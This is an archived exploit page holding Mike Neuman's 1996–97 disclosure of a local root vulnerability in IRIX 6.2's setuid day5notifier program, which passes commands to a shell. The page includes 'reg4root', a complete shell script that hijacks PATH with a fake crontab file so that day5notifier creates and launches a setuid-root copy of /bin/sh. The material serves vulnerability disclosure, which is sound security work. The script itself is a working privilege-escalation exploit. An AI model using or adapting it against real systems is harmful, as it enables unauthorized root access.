IRIX day5notifier hole
Description: | Hehe, the good folks at SGI apparently tried to avoid the system() call security problems, by an execve("/sbin/sh", "sh", "-c", "command..."). Ha! |
Author: | Mike Neuman <mcn@RIPOSTE.ENGARDE.COM> |
Compromise: | root (local) |
Vulnerable Systems: | IRIX 6.2 |
Date: | Mike reported it on 6 August 1996, but they apparently didn't get around to fixing it. |
Date: Fri, 16 May 1997 11:25:35 -0600
From: Mike Neuman <mcn@RIPOSTE.ENGARDE.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Day5notifier (IRIX 6.2 vulnerability)
This message was sent nearly a year ago to SGI, and their customer support
people still claim to have never heard of it. It only works on 6.2 (as far as
I know), but 6.2 is still the only OS available for Indy's. It also points
out a flaw in quite a few other SGI programs. Apparently an engineer read
the "How not to use the system() call", and made up his own alternative. :-)
=====
To: security-alert@sgi.com
Subject: Vulnerability in IRIX 6.2
Date: Tue, 06 Aug 1996 18:29:38 -0600
Hello!
This afternoon I decided to take a close look at some of the setuid
exectuables running on my IRIX 6.2 system. An hour later, I have at least
one major problem to report. :-) I've enclosed the exploit script below,
which contains a lengthy explanation at the top of the vulnerability and
why it exists.
If you have any questions, please feel free to contact me!
-Mike Neuman
mcn@EnGarde.com
-----
#!/bin/sh
# reg4root - Register me for Root!
#
# Exploit a bug in SGI's Registration Software
#
# -Mike Neuman
# mcn@EnGarde.com
# 8/6/96
#
# The bug is contained within the /var/www/htdocs/WhatsNew/CustReg/day5notifier
# program, apparently installed by default under IRIX 6.2. It may appear in
# the other setuid root program (day5datacopier) there, but I haven't had the
# time to check.
#
# SGI is apparently trying to do the right thing (by using execv() instead of
# system(), but apparently some engineer decided that execv() was too limited
# in capabilities, so he/she translated system() to:
#
# execve("/sbin/sh", "sh", "-c", "command...")
#
# This completely eliminates any security benefits execv() had!
#
# The program probably should not be setuid root. There are at least another
# dozen potential security vulnerabilities (ie. _RLD_* variables, race
# conditions, etc) found just by looking at strings.
#
# Note crontab and ps are only two of the problems. There are probably others.
MYPWD=`pwd`
mkdir /tmp/emptydir.$$
cd /tmp/emptydir.$$
cat <<EOF >crontab
cp /bin/sh ./suidshell
chmod 4755 suidshell
EOF
chmod +x crontab
PATH=.:$PATH
export PATH
/var/www/htdocs/WhatsNew/CustReg/day5notifier -procs 0
./suidshell
cd $MYPWD
rm -rf /tmp/emptydir.$$
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: